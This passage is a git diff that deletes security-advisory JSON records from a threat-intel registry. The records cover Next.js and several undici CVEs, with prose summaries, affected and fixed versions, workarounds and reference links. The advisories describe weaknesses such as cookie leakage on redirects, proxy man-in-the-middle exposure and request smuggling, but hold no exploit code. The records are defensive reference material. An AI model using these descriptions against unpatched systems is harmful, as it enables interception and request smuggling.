-    "GHSA-w37m-7fhw-fmv9"
-  ],
-  "cve_ids": [],
-  "ghsa_ids": [
-    "GHSA-w37m-7fhw-fmv9"
-  ],
-  "osv_ids": [
-    "GHSA-w37m-7fhw-fmv9"
-  ],
-  "affected_versions": [
-    "introduced=15.0.0-canary.0, fixed<15.0.6",
-    "introduced=15.1.1-canary.0, fixed<15.1.10",
-    "introduced=15.2.0-canary.0, fixed<15.2.7",
-    "introduced=15.3.0-canary.0, fixed<15.3.7",
-    "introduced=15.4.0-canary.0, fixed<15.4.9",
-    "introduced=15.5.1-canary.0, fixed<15.5.8",
-    "introduced=15.6.0-canary.0, fixed<15.6.0-canary.59",
-    "introduced=16.0.0-beta.0, fixed<16.0.9",
-    "introduced=16.1.0-canary.0, fixed<16.1.0-canary.17"
-  ],
-  "fixed_versions": [
-    "15.0.6",
-    "15.1.10",
-    "15.2.7",
-    "15.3.7",
-    "15.4.9",
-    "15.5.8",
-    "15.6.0-canary.59",
-    "16.0.9",
-    "16.1.0-canary.17"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage",
-    "dependency-upgrade-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2022-31151.json b/08-threat-intel/registry/advisories/undici--CVE-2022-31151.json
deleted file mode 100644
index 039d0d1e..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2022-31151.json
+++ /dev/null
@@ -1,79 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2022-31151",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect",
-  "summary": "### Impact\n\nAuthorization headers are already cleared on cross-origin redirect in\nhttps://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.\n\nHowever, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici.\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in v5.8.0.\n\n### Workarounds\n\nBy default, this vulnerability is not exploitable.\nDo not enable redirections, i.e. `maxRedirections: 0` (the default). \n\n### References\n\nhttps://hackerone.com/reports/1635514\nhttps://curl.se/docs/CVE-2018-1000007.html\nhttps://curl.se/docs/CVE-2022-27776.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n",
-  "published_at": "2022-07-21T20:31:05Z",
-  "updated_at": "2026-02-04T03:02:08.652391Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2022-31151",
-    "https://github.com/nodejs/undici/issues/872",
-    "https://github.com/nodejs/undici/pull/1441",
-    "https://github.com/nodejs/undici/commit/0a5bee9465e627be36bac88edf7d9bbc9626126d",
-    "https://hackerone.com/reports/1635514",
-    "https://github.com/nodejs/undici",
-    "https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189",
-    "https://github.com/nodejs/undici/releases/tag/v5.8.0",
-    "https://security.netapp.com/advisory/ntap-20220909-0006"
-  ],
-  "aliases": [
-    "CVE-2022-31151",
-    "GHSA-q768-x9m6-m9qp"
-  ],
-  "cve_ids": [
-    "CVE-2022-31151"
-  ],
-  "ghsa_ids": [
-    "GHSA-q768-x9m6-m9qp"
-  ],
-  "osv_ids": [
-    "GHSA-q768-x9m6-m9qp"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<5.8.0"
-  ],
-  "fixed_versions": [
-    "5.8.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary",
-    "token-cookie-storage",
-    "dependency-upgrade-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2022-32210.json b/08-threat-intel/registry/advisories/undici--CVE-2022-32210.json
deleted file mode 100644
index e0691e6b..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2022-32210.json
+++ /dev/null
@@ -1,71 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2022-32210",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "ProxyAgent vulnerable to MITM",
-  "summary": "### Description\n\n`Undici.ProxyAgent` never verifies the remote server's certificate, and always exposes all request & response data to the proxy. This unexpectedly means that proxies can MitM all HTTPS traffic, and if the proxy's URL is HTTP then it also means that nominally HTTPS requests are actually sent via plain-text HTTP between Undici and the proxy server.\n\n### Impact\n\nThis affects all use of HTTPS via HTTP proxy using **`Undici.ProxyAgent`**  with Undici or Node's global `fetch`. In this case, it removes all HTTPS security from all requests sent using Undici's `ProxyAgent`, allowing trivial MitM attacks by anybody on the network path between the client and the target server (local network users, your ISP, the proxy, the target server's ISP, etc).\nThis less seriously affects HTTPS via HTTPS proxies. When you send HTTPS via a proxy to a remote server, the proxy can freely view or modify all HTTPS traffic unexpectedly (but only the proxy). \n\n### Patches\n\nThis issue was patched in Undici v5.5.1.\n\n### Workarounds\n\nAt the time of writing, the only workaround is to not use `ProxyAgent` as a dispatcher for TLS Connections.",
-  "published_at": "2022-06-17T01:02:29Z",
-  "updated_at": "2026-03-13T22:15:23.541247Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2022-32210",
-    "https://hackerone.com/reports/1583680",
-    "https://github.com/nodejs/undici"
-  ],
-  "aliases": [
-    "CVE-2022-32210",
-    "GHSA-pgw7-wx7w-2w33"
-  ],
-  "cve_ids": [
-    "CVE-2022-32210"
-  ],
-  "ghsa_ids": [
-    "GHSA-pgw7-wx7w-2w33"
-  ],
-  "osv_ids": [
-    "GHSA-pgw7-wx7w-2w33"
-  ],
-  "affected_versions": [
-    "introduced=4.8.2, fixed<5.5.1"
-  ],
-  "fixed_versions": [
-    "5.5.1"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2023-45143.json b/08-threat-intel/registry/advisories/undici--CVE-2023-45143.json
deleted file mode 100644
index 6afa4ecc..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2023-45143.json
+++ /dev/null
@@ -1,81 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2023-45143",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici's cookie header not cleared on cross-origin redirect in fetch",
-  "summary": "### Impact\n\nUndici clears Authorization headers on cross-origin redirects, but does not clear `Cookie` headers. By design, `cookie` headers are [forbidden request headers](https://fetch.spec.whatwg.org/#forbidden-request-header), disallowing them to be set in `RequestInit.headers` in browser environments. Since Undici handles headers more liberally than the specification, there was a disconnect from the assumptions the spec made, and Undici's implementation of fetch.\n\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in [e041de359221ebeae04c469e8aff4145764e6d76](https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76), which is included in version 5.26.2.\n",
-  "published_at": "2023-10-16T14:05:37Z",
-  "updated_at": "2026-02-04T02:35:56.289390Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
-  "secondary_source_urls": [
-    "https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g",
-    "https://nvd.nist.gov/vuln/detail/CVE-2023-45143",
-    "https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76",
-    "https://hackerone.com/reports/2166948",
-    "https://github.com/nodejs/undici",
-    "https://github.com/nodejs/undici/releases/tag/v5.26.2",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"
-  ],
-  "aliases": [
-    "CVE-2023-45143",
-    "GHSA-wqq4-5wpv-mx2g"
-  ],
-  "cve_ids": [
-    "CVE-2023-45143"
-  ],
-  "ghsa_ids": [
-    "GHSA-wqq4-5wpv-mx2g"
-  ],
-  "osv_ids": [
-    "GHSA-wqq4-5wpv-mx2g"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<5.26.2"
-  ],
-  "fixed_versions": [
-    "5.26.2"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2024-30260.json b/08-threat-intel/registry/advisories/undici--CVE-2024-30260.json
deleted file mode 100644
index c5ce6032..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2024-30260.json
+++ /dev/null
@@ -1,79 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2024-30260",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline",
-  "summary": "### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3",
-  "published_at": "2024-04-04T14:20:39Z",
-  "updated_at": "2025-11-04T19:44:28Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2024-30260",
-    "https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f",
-    "https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75",
-    "https://hackerone.com/reports/2408074",
-    "https://github.com/nodejs/undici",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
-    "https://security.netapp.com/advisory/ntap-20240905-0008"
-  ],
-  "aliases": [
-    "CVE-2024-30260",
-    "GHSA-m4v8-wqvr-p9f7"
-  ],
-  "cve_ids": [
-    "CVE-2024-30260"
-  ],
-  "ghsa_ids": [
-    "GHSA-m4v8-wqvr-p9f7"
-  ],
-  "osv_ids": [
-    "GHSA-m4v8-wqvr-p9f7"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<5.28.4",
-    "introduced=6.0.0, fixed<6.11.1"
-  ],
-  "fixed_versions": [
-    "5.28.4",
-    "6.11.1"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2024-30261.json b/08-threat-intel/registry/advisories/undici--CVE-2024-30261.json
deleted file mode 100644
index feaf3f60..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2024-30261.json
+++ /dev/null
@@ -1,79 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2024-30261",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect",
-  "summary": "### Impact\n\nIf an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered.\n\n### Patches\n\nFixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3.\nFixes has been released in v5.28.4 and v6.11.1.\n\n\n### Workarounds\n\nEnsure that `integrity` cannot be tampered with.\n\n### References\n\nhttps://hackerone.com/reports/2377760",
-  "published_at": "2024-04-04T14:20:54Z",
-  "updated_at": "2025-11-04T19:44:42Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2024-30261",
-    "https://github.com/nodejs/undici/commit/2b39440bd9ded841c93dd72138f3b1763ae26055",
-    "https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3",
-    "https://hackerone.com/reports/2377760",
-    "https://github.com/nodejs/undici",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
-    "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
-    "https://security.netapp.com/advisory/ntap-20240905-0008"
-  ],
-  "aliases": [
-    "CVE-2024-30261",
-    "GHSA-9qxr-qj54-h672"
-  ],
-  "cve_ids": [
-    "CVE-2024-30261"
-  ],
-  "ghsa_ids": [
-    "GHSA-9qxr-qj54-h672"
-  ],
-  "osv_ids": [
-    "GHSA-9qxr-qj54-h672"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<5.28.4",
-    "introduced=6.0.0, fixed<6.11.1"
-  ],
-  "fixed_versions": [
-    "5.28.4",
-    "6.11.1"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2025-22150.json b/08-threat-intel/registry/advisories/undici--CVE-2025-22150.json
deleted file mode 100644
index 45bf753e..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2025-22150.json
+++ /dev/null
@@ -1,80 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2025-22150",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Use of Insufficiently Random Values in undici",
-  "summary": "### Impact\n\n[Undici `fetch()` uses Math.random()](https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113) to choose the boundary for a multipart/form-data request. It is known that the output of Math.random() can be predicted if several of its generated values are known.\n\nIf there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. Therefore, An attacker can tamper with the requests going to the backend APIs if certain conditions are met.\n\n### Patches\n\nThis is fixed in 5.28.5; 6.21.1; 7.2.3.\n\n### Workarounds\n\nDo not issue multipart requests to attacker controlled servers.\n\n### References\n\n* https://hackerone.com/reports/2913312\n* https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f\n",
-  "published_at": "2025-01-21T21:10:47Z",
-  "updated_at": "2026-02-04T02:29:26.373390Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-22150",
-    "https://github.com/nodejs/undici/commit/711e20772764c29f6622ddc937c63b6eefdf07d0",
-    "https://github.com/nodejs/undici/commit/c2d78cd19fe4f4c621424491e26ce299e65e934a",
-    "https://github.com/nodejs/undici/commit/c3acc6050b781b827d80c86cbbab34f14458d385",
-    "https://hackerone.com/reports/2913312",
-    "https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f",
-    "https://github.com/nodejs/undici",
-    "https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113"
-  ],
-  "aliases": [
-    "CVE-2025-22150",
-    "GHSA-c76h-2ccp-4975"
-  ],
-  "cve_ids": [
-    "CVE-2025-22150"
-  ],
-  "ghsa_ids": [
-    "GHSA-c76h-2ccp-4975"
-  ],
-  "osv_ids": [
-    "GHSA-c76h-2ccp-4975"
-  ],
-  "affected_versions": [
-    "introduced=4.5.0, fixed<5.28.5",
-    "introduced=6.0.0, fixed<6.21.1",
-    "introduced=7.0.0, fixed<7.2.3"
-  ],
-  "fixed_versions": [
-    "5.28.5",
-    "6.21.1",
-    "7.2.3"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2025-47279.json b/08-threat-intel/registry/advisories/undici--CVE-2025-47279.json
deleted file mode 100644
index 854e4db7..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2025-47279.json
+++ /dev/null
@@ -1,77 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2025-47279",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "undici Denial of Service attack via bad certificate data",
-  "summary": "### Impact\n\nApplications that use undici to implement a webhook-like system are vulnerable. If the attacker set up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. \n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/pull/4088.\n\n### Workarounds\n\nIf a webhook fails, avoid keep calling it repeatedly.\n\n### References\n\nReported as: https://github.com/nodejs/undici/issues/3895",
-  "published_at": "2025-05-15T14:15:06Z",
-  "updated_at": "2026-02-06T22:08:08.311705Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-j4jr-qwg3",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-47279",
-    "https://github.com/nodejs/undici/issues/3895",
-    "https://github.com/nodejs/undici/pull/4088",
-    "https://github.com/nodejs/undici/commit/f317618ec28753a4218beccea048bcf89c36db25",
-    "https://github.com/nodejs/undici"
-  ],
-  "aliases": [
-    "CVE-2025-47279",
-    "GHSA-cxrh-j4jr-qwg3"
-  ],
-  "cve_ids": [
-    "CVE-2025-47279"
-  ],
-  "ghsa_ids": [
-    "GHSA-cxrh-j4jr-qwg3"
-  ],
-  "osv_ids": [
-    "GHSA-cxrh-j4jr-qwg3"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<5.29.0",
-    "introduced=6.0.0, fixed<6.21.2",
-    "introduced=7.0.0, fixed<7.5.0"
-  ],
-  "fixed_versions": [
-    "5.29.0",
-    "6.21.2",
-    "7.5.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-1525.json b/08-threat-intel/registry/advisories/undici--CVE-2026-1525.json
deleted file mode 100644
index d93082ba..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2026-1525.json
+++ /dev/null
@@ -1,77 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2026-1525",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici has an HTTP Request/Response Smuggling issue",
-  "summary": "### Impact\n\nUndici allows duplicate HTTP `Content-Length` headers when they are provided in an array with case-variant names (e.g., `Content-Length` and `content-length`). This produces malformed HTTP/1.1 requests with multiple conflicting `Content-Length` values on the wire.\n\n**Who is impacted:**\n  - Applications using `undici.request()`, `undici.Client`, or similar low-level APIs with headers passed as flat arrays\n  - Applications that accept user-controlled header names without case-normalization\n\n**Potential consequences:**\n  - **Denial of Service**: Strict HTTP parsers (proxies, servers) will reject requests with duplicate `Content-Length` headers (400 Bad Request)\n  - **HTTP Request Smuggling**: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijacking\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\n  If upgrading is not immediately possible:\n\n  1. **Validate header names**: Ensure no duplicate `Content-Length` headers (case-insensitive) are present before passing headers to undici\n  2. **Use object format**: Pass headers as a plain object (`{ 'content-length': '123' }`) rather than an array, which naturally deduplicates by key\n  3. **Sanitize user input**: If headers originate from user input, normalize header names to lowercase and reject duplicates",
-  "published_at": "2026-03-13T20:07:03Z",
-  "updated_at": "2026-03-14T09:19:54.772219Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2026-1525",
-    "https://hackerone.com/reports/3556037",
-    "https://cna.openjsf.org/security-advisories.html",
-    "https://cwe.mitre.org/data/definitions/444.html",
-    "https://github.com/nodejs/undici",
-    "https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"
-  ],
-  "aliases": [
-    "CVE-2026-1525",
-    "GHSA-2mjp-6q6p-2qxm"
-  ],
-  "cve_ids": [
-    "CVE-2026-1525"
-  ],
-  "ghsa_ids": [
-    "GHSA-2mjp-6q6p-2qxm"
-  ],
-  "osv_ids": [
-    "GHSA-2mjp-6q6p-2qxm"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<6.24.0",
-    "introduced=7.0.0, fixed<7.24.0"
-  ],
-  "fixed_versions": [
-    "6.24.0",
-    "7.24.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary",
-    "request-smuggling-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-1526.json b/08-threat-intel/registry/advisories/undici--CVE-2026-1526.json
deleted file mode 100644
index bb0c465c..00000000
